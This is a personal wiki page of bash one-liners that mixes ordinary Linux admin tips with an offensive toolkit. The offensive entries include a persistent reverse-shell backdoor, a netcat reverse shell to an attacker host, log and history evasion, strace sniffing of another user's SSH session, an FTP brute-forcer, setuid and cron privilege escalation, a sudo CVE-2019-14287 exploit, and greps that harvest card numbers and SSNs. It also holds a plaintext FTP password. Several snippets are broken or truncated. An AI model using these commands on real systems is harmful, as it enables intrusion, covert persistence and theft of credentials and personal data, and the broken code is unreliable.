Skip to content


# myBestOneLiners

And some other tips and tricks..

Do you know a better or more efficient way to perform any of my oneliners, I would like to know how this can be done, I love learning new ways and doing it effectively and I love linux. If you see something that is wrong or "negative", I also want to know, feel free to explain why as clearly as possible AND I want to know how to do it in the right "way". Pipefalls there is so much of, I want to do it the "right" way and get deeper into the "POSIX" way to do things, contribute pleaase 🐧

If you can not then I hope I contributed to you instead via sharing the knowledge.

You can copy and use my wiki as much as you want as long as you follow GPL v3.0 but IF you want to link or share something from my wiki I would be happy if you make a link to the wiki so more people can find here and the more we is the better we can do this together.

All scripts are created by me personally (I will be clear with who the creator is and where I got the script from if it is not from myself) and licensed under GPL v3.0, this also applies to the scripts that I can use without a header / author / title in the script.

Thank you for showing your respect and being honest, I'm passionate about freedom and freedom of speech!


My Hardware used in previews:

Internet :
CPU Model: Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz
CPU Cores: `printf '%s' $(nproc)` = 48

Use $((nproc + 1)) for the best perfomance, for threads I trying to use $((nproc + 1)) x 2 for best perfomance.

export NUMCPUS=$(nproc)

And then:

parallel -j${NUMCPUSPLUSONE} -n${NUMTHREADS} ....

Try Tor connection

curl --socks5 localhost:9050 \
     --socks5-hostname localhost:9050 \

Create a backdoor for reverse shell



nohup bash -c ' \
while :;do
   setsid bash -i &>/dev/tcp/$IP/$PORT 0>&1; 
   sleep 3600; 
done' &>/dev/null &

fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
nohup /bin/bash -c ' \
while :; do 
    touch /dev/shm/.busy;
    exec 3</dev/shm/.busy; 
    setsid bash -i &>/dev/tcp/$IP/$PORT ; 
    sleep 3600; 
done' &>/dev/null &

Almost invisible SSH

Author hackerschoice

This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.

ssh -o UserKnownHostsFile=/dev/null -T "bash -i"

Leave bash without History

Tell Bash to use /dev/null instead of ~/.bash_history This is the first command we execute on every shell. It will stop the Bash from logging your commands.

export HISTFILE=/dev/null

Run commmands hidden from admin

/bin/bash -c "exec ls"

Bash Suicide

kill -9  $$
Warning: Program '/bin/bash' crashed.

Shred and Wipe without Shred

dd bs=1k count="`du -sk \"${FN}\"|cut -f1`" if=/dev/urandom >"${FN}"; 
rm -f "${FN}"

Sniff a user's SSH session with strace

strace -e trace=read -p <PID> 2>&1 \
    |while read x; do echo "$x" \
    |grep '^read.*= [1-9]$' \
    |cut -f2 -d\"; 

Check if a port is open or closed in pure Bash

 ( echo > /dev/tcp/; ) &> /dev/null 1>&2 | \
 if [[ $? = "0" ]]; then echo "up"; else echo "down"; fi


( : <> /dev/tcp/;) \
    &> /dev/null 1>&2 \
    && echo "up" \
    || echo "closed"

Browse to in pure Bash

exec 5<>/dev/tcp/
echo -e "GET / HTTP/1.0\n" >&5
cat <&5

Run last command again


Below will open your editor andt paste the last 20 commands you used in cli

fc -1 -20

Clone starred github repos in parallel with unlimited speed, clone 20 repos in parallel.

  • xargs
    curl "${GITUSER}/starred?per_page=1000" \
        |grep -o 'git@[^"]*' \
        |xargs -n -P20 -L1 git clone

Also shared here

  • Parallel
curl "${GITUSER}/starred?per_page=1000" \
    |grep -o 'git@[^"]*' \
    |parallel -j 25 'git clone {}'

Really fast portscanner with colorized output:

65535 ports scanned in ~3.5s


seq 65535 | \
    parallel \
        -k --joblog portscan \
    -j9 \
    --pipe \
    --cat \
    -j200% \
    -n9000 \
    --tagstring '\033[30;3{=$_=++$::color%8=}m' \
    'nc -vz localhost $(head -n1 {})-$(tail -n1 {})'

Bruteforce two ftp accounts at once

# Author: wuseman
# Desc: Bruteforce 2 accounts at once

okMSG() {
    echo -e "[\e[1;32m*\e[0m] $*"

errMSG() {
    echo -e "[\e[1;31m*\e[0m] $*"

1() {
    curl ftp://host:port -u $line &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line" || errMSG "Bad password for $line"

2() {
    curl ftp://host:port -u $line1 &> /dev/null -u $line1 &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line1" || errMSG "Bad password for $line1"

    read line;read line1; 
    1;2;sleep 0.1;
done < test

Download files fast as ****:

time seq 1000|parallel -a 1 -j1000 wget

Exploit Cronie - If a script is running with higher privileges

echo "cat /challenge/app-script/ch4/.passwd >/tmp/cracked" > \
    cron.d/go && chmod a+x cron.d/go \
    && sleep 60 && \
    cat /tmp/cracked

Fix broken SSH permissions for client

chmod 700 ~/.ssh
chmod 644 ~/.ssh/authorized_keys
chmod 644 ~/.ssh/known_hosts
chmod 644 ~/.ssh/config
chmod 600 ~/.ssh/id_rsa
chmod 644 ~/.ssh/
chmod 600 ~/.ssh/github_rsa
chmod 644 ~/.ssh/
chmod 600 ~/.ssh/mozilla_rsa
chmod 644 ~/.ssh/

Find users that is not used in /etc/passwd

for shell in $(</etc/shells);do
  count=`grep -c $shell /etc/passwd`
  if [ $count -eq 0 ]; then echo $shell not used in /etc/passwd;fi
getent passwd | awk -F ':' '{print $1}' > allusers

cut -d: -f1 /etc/passwd
sed 's/:.*//' /etc/passwd
awk -F: '{print $1}' /etc/passwd

C program to get a shell

#include <stdlib.h>
#include <unistd.h>

int main() {
    setresuid(1028, 1028, 1028);
    setresuid(1028, 1028, 1028);  
    return 0;

#### Compile and prepare

gcc -o /tmp/pwned /tmp/._cron/shell.c
chmod +s /tmp/pwned   
chmod a+rwx /tmp/pwned

If you need to kill a specific process using a given port

fuser -k 445/tcp

Broadcast your shell thru port 5000

bash -i 2>&1 | tee /dev/stderr | nc -l 5000

You can use the following trick to easy navigate and select paths

mkdir fooPath && cd $_

Fastest segmented parallel sync of a remote directory over ssh

lftp -u user,pwd -e "set sftp:connect-program 'ssh -a -x -T -c arcfour -o Compression=no'; \
mirror -v -c --loop --use-pget-n=3 -P 2 /remote/dir/ /local/dir/; quit" sftp://remotehost:22

Find dupe files and colorize output:

find /glftpd/site/archive -type f | \
    egrep '([0-9]\{1,9\})\.[^.]\+$'|parallel -n1 -j200% md5sum ::: | \
    awk 'x[$1]++ { print $2 " :::"}' |  \
    sed 's/^/Dupe: /g' | \
    sed 's,Dupe,\x1B[31m&\x1B[0m,'

Create a progress bar over entire window until we count to 1000

seq 1000 |parallel -j30 --bar '(echo {};sleep 0.1)'

Ports we probably wanna set as accpepted in our iptable chains

lsof -i -nlP|awk '{print $9, $8, $1}'|sed 's/.*://'|sort -u

For add those ports to iptable:


lsof -i -nlP|awk '{print $9}'|sed 's/.*://'|sort -u|column -t | \
    sed 's/^/iptables -A INPUT -p TCP --dport /g'\
    |sed 's/$/ -m state --state NEW -j ACCEPT/g
netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u
int main(void)
        system("ls /path/to/.passwd");
        return 0;

Then run:

ln -s /bin/cat /tmp/ls
ls -l /tmp/ls
echo $PATH
echo -e "URL Title: $(curl -s $1|grep -i title|cut -d'<' -f2|cut -d'>' -f2)"

Create a UEFI bootable usb:

parted /dev/sdc -s print
mkfs.vfat -F 32 /dev/<device>1
mount /dev/<device>1 /<dev_mountpoint>
mount /path/to/iso/Win10_1511_1_<Version>_<Language>_x64.iso /<iso_mountpoint>
cp -R /<iso_mountpoint>/* /<dev_mountpoint>/
printf '%s' "Done" 

Setup efiboomgr

You should know how to edit this line otherwise, man efibootmgr

efibootmgr -d /dev/sda -p 2 -c -L "Gentoo Linux" -l /vmlinuz-5.4.97-gentoo-x86_64 -u "cryptdevice=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8:latitude-rootfs root=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8 rw initrd=/initramfs-5.4.97-gentoo-x86_64.img"

Run 10 curl commands in parallel via xargs

NUM="10";time seq ${NUM}|time xargs -I % -n1 -P${NUM} curl -sL
grep "cpu " /proc/stat | awk -F ' ' '{total = $2 + $3 + $4 + $5} END {print "idle \t used\n" $5*100/total "% " $2*100/total "%"}'

Rounds Slower is better, as slow as you can tolerate. Timing for different -a values, each measured 20 times:

for j in 16 32 64 100 150; do
    echo -n "-a $j takes on average";
     for i in {1..20}; do
         ssh-keygen -qa $j -t ed25519 -f test -N test;
         time ssh-keygen -qa $j -N tost -pP test -f test;
         rm test{.pub,};
     done |& ```sh
grep real | awk -F m '{print $2}' | tr -d s | awk '{sum+=$1} END{print sum/NR}';


paste <(cat /sys/class/thermal/thermal_zone*/type) \
      <(cat /sys/class/thermal/thermal_zone*/temp) \
    |column -s $'\t' -t \
    |sed 's/\(.\)..$/.\1°C/'
for zone in `ls /sys/class/thermal/ | ```sh
grep thermal_zone`;do
    echo -n "`cat /sys/class/thermal/${zone}/type`: "
    echo `cat /sys/class/thermal/$zone/temp | sed 's/\(.\)..$/.\1°C/'`
flashing_text () { 
  wuzi='*w*u*s*e*m*a*n*_*p*w*n*z \e[00;34m !';
  for i in {0..59}; do
      echo -ne "\r${wuzi:0:$i}" ;sleep 0.05;

awk -F": " '/cpu MHz\ */ { print "Processor (or core) running speed is: " $2 }' /proc/cpuinfo ; 
dmidecode | awk -F": " '/Current Speed/ { print "Processor real speed is: " $2 }'

Some distro checker commands I used during the years in my scripts

distro=$(cat /etc/os-release|head -n 1|cut -d'=' -f2|sed 's/"//g'| awk '{print tolower($0)}')
distro2="$(cat /etc/issue | head -n +1 | awk '{print $1}')"
distro3="$(tr -s ' \011' '\012' < /etc/issue | head -n 1)"
distro4="$(cat /etc/issue | head -n +1 | awk '{print $1}')"
distro5="$(cat /etc/os-release | ```sh
grep "PRETTY_NAME" | sed 's/PRETTY_NAME=//g' | sed 's/["]//g' | awk '{print $1}')"
awk -F'"' '/NAME/ {print tolower($2)} /NR=2/' /etc/os-release|head -n 1

Get your monitor/screen model

while read -r output hex conn; do
    [[ -z "$conn" ]] && conn=${output%%-*}
    echo "# $output $conn   $(xxd -r -p <<< "$hex")"
done < <(xrandr --prop | awk '
    !/^[ \t]/ {
        if (output && hex) print output, hex, conn
    /ConnectorType:/ {conn=$2}
    /[:.]/ && h {
        sub(/.*000000fc00/, "", hex)
        hex = substr(hex, 0, 26) "0a"
        sub(/0a.*/, "", hex)
    h {sub(/[ \t]+/, ""); hex = hex $0}
    /EDID.*:/ {h=1}
    END {if (output && hex) print output, hex, conn}
    ' | sort

Simple IFS example

bash -c 'set a b c d; IFS="+-;"; echo "$*"'

Date script for print days, hours, minutes and seconds between the dates

then=$(date -u -d "2014-10-25 00:00:00" +%s)
now=$(date -u +%s)
date -u -d "2014-01-01 $now sec - $then sec" +"%j days %H hours %M minutes and %S seconds"

Convert a magnet url to a torrent file

[[ "$1" =~ xt=urn:btih:([^&/]+) ]] || exit;
echo "d10:magnet-uri${#1}:${1}e" > "meta-${BASH_REMATCH[1]}.torrent"

Check harddrive space and print green after our value is reached or not

HDFREE=$(df -h|e```sh
grep  "[0-9].*\/$"|awk '{print $5}'|sed 's/%//g')

if [[ $HDFREE -lt 50 ]]; then
echo -e "Your shared hard drive is \e[1;31m${HDFREE}%\e[0m full"
echo -e "Your shared hard drive is \e[1;32m${HDFREE}%\e[0m full"

How I grab valuable stuff from apk files (extracted)

grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password\
|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager \
|insert into" APKfolder/

Get Sensor Data Without Any Info

cat /sys/class/thermal/thermal_zone*/temp

Resize all jpg images to 50% of the original size

find . -maxdepth 1 -iname "*.jpg" | xargs -L1 -I{} convert -resize 50% "{}" _half/"{}"

Find IOMMU groups

for d in /sys/kernel/iommu_groups/*/devices/*; do
    n=${d#*/iommu_groups/*}; n=${n%%/*}; 
    printf 'IOMMU Group %s ' "$n"; 
    lspci -nns "${d##*/}"; 

Use curl as a pro

Do It Once

seq 1 | parallel -n0 "curl -H 'Content-Type: application/json' \ -X POST \
    -d '{\"url\":\"\"}'"

Do It Twice

seq 2 | parallel -n0 "curl -H 'Content-Type: application/json' \ -X POST \
    -d '{\"url\":\"\"}'"

Do It 4 Times, But At 2 A Aime

seq 4 | parallel -n0 -j2 "curl -H 'Content-Type: application/json' \ -X POST -d '{\"url\":\"\"}'"

More parallel tricks for curl

seq 1 | parallel -n0 curl \
    "http --ignore-stdin POST url="

Continue until forever until we press ctrl+c (100x)

Before we will do it again, wait for all tasks to be completed and we start over again

target=${1:-$(cat 1)}
while true; do
    for i in $(seq 100);do curl $target > /dev/null & 

Check if a zip or a rar file has password-protection

If you need to check if zip or rar file has password protection you can do it this way.


  • ZIP
crypted=$( 7z l -slt -- $file | grep -i -c "Encrypted = +" )
if [ "$crypted" -eq "1" ]; then
  • Unrar
unrar x -p- -y -o+ "$file" 1&gt; /dev/null 2&gt; /dev/null
if [ "$?" -eq "3" ] ; then
    unrar x -p$password -y -o+ "$file" 1&gt; /dev/null 2&gt; /dev/null

Make changes in .bashrc immediately available

bashrc-reload() { 
    builtin unalias -a; builtin unset -f $(builtin declare -F | \
     sed 's/^.*declare[[:blank:]]\+-f[[:blank:]]\+//'); 
    source ~/.bashrc; 

Delete static and dynamic arp for /24 subnet

for i in {1..254}; do 
    arp -d 192.168.0.$i; 

Preserve your fingers from cd ..; cd ..; cd..; cd..;

up() { 
    DEEP=$1; 'for i in $(seq 1 ${DEEP:-"1"}); do cd ../; 

Get executed script's current working directory

CWD=$(cd "$(dirname "$0")" && pwd)

Scan all open ports without any required program

for i in {1..65535}; do 
    (echo < /dev/tcp/$i) &>/dev/null && \
    printf "\n[+] Open Port at\n: \t%d\n" "$i" \
    || printf "."; 

Create a txt files with 10000 rows

for FILE in *.full ; do 
    split -l 100000 $FILE; mv -f xaa `echo "$FILE" \
    | cut -d'.' -f1`.txt; rm -f x*; 

File transfer as a PRO


ftp -n IP <<END_SCRIPT
quote USER acknak
quote PASS jLQRZy4gyLhmMqz2whTw
exit 0

This can also be done over PHP

<?php echo shell_exec("echo open 21>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user acknak jLQRZy4gyLhmMqz2whTw>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>

<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>

Escaping Shells

echo FREEDOM! && cd () bash && cd

TAR can read all files, so you can create a tar with a wanted file and than extract it

tar -cvf shadow.tar "/etc/shadow"
tar -xvf shadow.tar
cat etc/shadow

Netcat without -e

A lot of machines have netcat installed (example macosx) but it's not usable for reverse shells. However, with this it becomes useable.

mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <ATTACKER IP> <PORT> 1>/tmp/backpipe

Overcome limited shells

Some payloads to overcome limited shells

ssh user@$ip nc $localip 4444 -e /bin/sh
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux


#### Bash
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";


perl —e 'exec "/bin/sh";'


# /bin/dash is the only shell to keep the sticky bit, so if you run as root (included cron, or services running as root): 
install -mode 4755 /bin/dash /tmp/sh
# Then you will have a /tmp/sh that gives any user who calls it root !

Abusing Sudo Rights (CVE 2019-14287)

Exploitable when a user have the following permissions (sudo -l)

(ALL, !root) ALL

If you have a full TTY, you can exploit it like this

sudo -u#-1 /bin/bash

If no TTY, you can restart SSH server and add your key

sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bash



grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt


grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt

American Express

grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt

Diners Club

grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt


grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt


grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt


grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt

Extract IDs

Extract Social Security Number (SSN)

grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" 

Extract Indiana Driver License Number

grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" 

Extract US Passport Cards

grep -E -o "C0[0-9]{7}" 

Extract US Passport Number

grep -E -o "[23][0-9]{8}"

Extract US Phone Numberss

grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' 

Extract ISBN Numbers

grep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+\
    [- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ])\
    {4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" 

Last update: August 10, 2022
Created: August 10, 2022